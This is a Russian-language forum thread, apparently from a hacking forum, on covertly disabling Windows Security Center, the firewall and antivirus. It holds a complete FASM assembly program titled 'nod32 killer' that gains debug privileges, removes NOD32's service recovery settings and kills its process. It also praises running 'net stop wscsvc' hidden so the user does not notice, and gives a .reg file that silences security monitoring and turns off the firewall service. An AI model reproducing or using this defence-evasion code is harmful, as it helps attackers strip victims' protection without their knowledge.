Всем известен "центр безопасности" и когда отключается антивирус или FireWall в трее появляется сообщение, что произошло отключение и висит красный щиток Вот может кто сталкивался с тем как отключить этот центр безопасности... Где что поменять :confused:

Останови сервис "Центр обеспечения безопасности" и всё.

кликни по этому значку, там откроется окно, слева должны быть разные ссылки и среди них есть настройки...вот там и вырубай (говорю по памяти, поскольку давно переустанавливал винду, уже точно и не помню...)

///groundhog: гениально, и как он сам не додумался?

Ребята я имею ввиду программно -> останавливать сервис (как советует groundhog) как его вычислить? или можно в реестре изменить чего-нибуд :confused:

net stop wscsvc
или программно убей Security Center. Смотри сорцы класса ServiceManager (http://www.codeproject.com/useritems/ServiceManager.asp)

MstDoc Читай пост №4 :)

Deem3n® Гениально!!! Запустить скрыто командную строку и передать ей "net stop wscsvc" и пользователь не замет что слетел антивирь :)
Deem3n® Респектище, лучше и не придумаешь!!!

MstDoc Читай пост №4 :)

Deem3n® Гениально!!! Запустить скрыто командную строку и передать ей "net stop wscsvc" и пользователь не замет что слетел антивирь :)
Deem3n® Респектище, лучше и не придумаешь!!!
Видимо программно останавливать сервис мы не умеем?
OpenSCManagerA, OpenServiceA, ControlService

_Great_ Да я пока не учился ;)
командную строку и передать ей "net stop wscsvc" - в одну WinAPi
OpenSCManagerA, OpenServiceA, ControlService - Три вызова! :)

// А так, _Great_ спасибо за подсказку, попрактикуюсь с сервисами

Пример работы с Нодом:

; --------------------------------------------------------------------------------------
; nod32 killer
; Created by Ct757
; --------------------------------------------------------------------------------------

format PE GUI 4.0
entry start

include '%fasminc%\win32a.inc'

section '.main' code readable writeable executable

SC_MANAGER_ALL_ACCESS = 0x000F003F
SERVICE_ALL_ACCESS = 0x000F01FF

SERVICE_CONFIG_FAILURE_ACTIONS = 2
SERVICE_CONTROL_STATUS_REASON_INFO = 1

; szNODService db 'SYSTEM\CurrentControlSet\Services\NOD32krn',0
; szFailureActions db 'FailureActions',0

szNODExeFile db 'nod32krn.exe',0
szSeDebugPrivilege db 'SeDebugPrivilege',0

szNODSvcName db 'NOD32krn',0

; hKey dd ?

hSCM dd ?
hSvc dd ?

hSnap dd ?
hToken dd ?
ReturnLength dd ?

align 0x10

tkp: ; struct TOKEN_PRIVILEGES
.PrivilegeCount dd ?
.LowPart dd ?
.HighPart dd ?
.Attributes dd ?

PrivLUID: ; struct LUID
.LowPart dd ?
.HighPart dd ?

sfa: ; struct SERVICE_FAILURE_ACTIONS
.dwResetPeriod dd -1
.lpRebootMsg dd 0
.lpCommand dd 0
.cActions dd 3
.lpsaActions dd act

act db (2*4*3) dup (0) ; array of 3 SC_ACTION structs


p_ent: ; struct PROCESSENTRY32
.dwSize dd p_ent_size
.cntUsage dd ?
.th32ProcessID dd ?
.th32DefaultHeapID dd ?
.th32ModuleID dd ?
.cntThreads dd ?
.th32ParentProcessID dd ?
.pcPriClassBase dd ?
.dwFlags dd ?
.szExeFile db 260 dup(?)
p_ent_size = $ - p_ent

start:

; --------------------------------------------------------------------------------------
; Получение отладочных привилегий:

invoke OpenProcessToken,-1,0x0028,hToken

invoke LookupPrivilegeValue,0,szSeDebugPrivilege,PrivLUID
test eax,eax
je close_token

push [PrivLUID.LowPart]
pop [tkp.LowPart]
push [PrivLUID.HighPart]
pop [tkp.HighPart]
mov [tkp.Attributes],2 ; SE_PRIVILEGE_ENABLED
mov [tkp.PrivilegeCount],1

invoke AdjustTokenPrivileges,[hToken],FALSE,tkp,0x10,tkp,ReturnLength

close_token:
invoke CloseHandle,[hToken]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Отключение восстановления сервиса через SCM:

invoke OpenSCManager,0,0,SC_MANAGER_ALL_ACCESS
test eax,eax
je exit

mov [hSCM],eax

invoke OpenService,eax,szNODSvcName,SERVICE_ALL_ACCESS
test eax,eax
je close_scm

mov [hSvc],eax

invoke ChangeServiceConfig2,eax,SERVICE_CONFIG_FAILURE_AC TIONS,sfa

invoke CloseServiceHandle,[hSvc]

close_scm:
invoke CloseServiceHandle,[hSCM]

; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Вариант отключения восстановления напрямую через реестр:
;
; invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,szNODService,0,KEY _SET_VALUE,hKey
; test eax,eax
; jne exit
;
; invoke RegDeleteValue,[hKey],szFailureActions
;
; invoke RegCloseKey,[hKey]
;
; --------------------------------------------------------------------------------------

; --------------------------------------------------------------------------------------
; Поиск и завершение процесса:

find_nod32_pid:
invoke CreateToolhelp32Snapshot,2,0
inc eax
je exit
dec eax

mov [hSnap],eax

invoke Process32First,eax,p_ent
test eax,eax
je close_snap

check_process:
invoke lstrcmpi,p_ent.szExeFile,szNODExeFile
test eax,eax
jne next_process

invoke OpenProcess,PROCESS_TERMINATE,FALSE,[p_ent.th32ProcessID]
test eax,eax
je next_process
xchg eax,ebx

invoke TerminateProcess,ebx,0

invoke CloseHandle,ebx

next_process:
invoke Process32Next,[hSnap],p_ent
test eax,eax
jne check_process

close_snap:
invoke CloseHandle,[hSnap]

; --------------------------------------------------------------------------------------

exit:
invoke ExitProcess,0

section '.idata' import data readable writeable

library kernel32, 'KERNEL32.DLL',\
user32, 'USER32.DLL',\
advapi32, 'ADVAPI32.DLL'

include '%fasminc%\APIA\kernel32.inc'
include '%fasminc%\APIA\user32.inc'
include '%fasminc%\APIA\advapi32.inc'

мля ты сама поняла что выложила? нод можно убить только если у юзера имеються права админа... в любом другом случае он начнет восстанавливаться - проверено на последней сборке... там несколько ядер... имон... амон и резидентная защита...

Отключить «Центр безопасности»
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wscsvc
Параметр «Start»:dword присвойте ему значение «4», чтобы отключить запуск «Центра безопасности» и не выводить его значок в «Области уведомлений» (системном трее) «Панели задач».

Отменить мониторинг наличия антивирусного программного обеспечения
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «AntiVirusOverride»:dword присвойте ему значение «1», чтобы отключить отслеживание наличия антивирусного программного обеспечения.

Отменить мониторинг сети при помощи встроенного файрволла
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «FirewallOverride»:dword присвойте ему значение «1», чтобы не следить за сетью при помощи встроенного файрволла «Windows».

Отключить уведомления встроенного файрволла
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «FirewallDisableNotify»:dword присвойте ему значение «1», чтобы отключить уведомления встроенного файрволла «Windows», выводимые в «Области уведомлений» (системном трее) «Панели задач».

Отключить службу встроенного файрволла
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess
Параметр «Start»:dword присвойте ему значение «4», чтобы отключить службу (сервис) встроенного файрволла «Windows».

Отключить уведомления слежения за антивирусным обеспечением
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «AntiVirusDisableNotify»:dword присвойте ему значение «1», чтобы отключить уведомления слежения за антивирусным обеспечением, выводимые в «Области уведомлений» (системном трее) «Панели задач».

Отключить уведомления службы «Автоматического обновления»
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Параметр «UpdatesDisableNotify» :dword присвойте ему значение «1», чтобы отключить уведомления службы «Автоматического обновления», выводимые в «Области уведомлений» (системном трее) «Панели задач».

(с) Te0s @ bogdanovich.ru

или попробуй так:

Создать reg файл следующего содержания: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] "AntiVirusDisableNotify"=dword:00000001 "FirewallDisableNotify"=dword:00000001 "UpdatesDisableNotify"=dword:00000001 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] "AntiVirusOverride"=dword:00000001 "FirewallOverride"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wscsvc] "Start"=dword:00000004 -

Y.Dmitriy Пофик, главное попрактиковаться :) А попрактиковаться и на старых версия можно!

Elvis000 А как же быть с проактивной защитой к примеру каспера :(

Elvis000 А как же быть с проактивной защитой к примеру каспера

Жми разрешить, либо приостанови защиту. А вообще конкретнее надо вопросы задавать. :)

Попробуй посмотри здесь, возможно поможет: https://forum.antichat.ru/threadnav42447-1-10.html

А как же быть с проактивной защитой к примеру каспера
Обсуждалось много раз, поищи на васме информацию.
Жми разрешить, либо приостанови защиту.
Угу, самый хакерский способ - это жать на кнопочки, уважуха.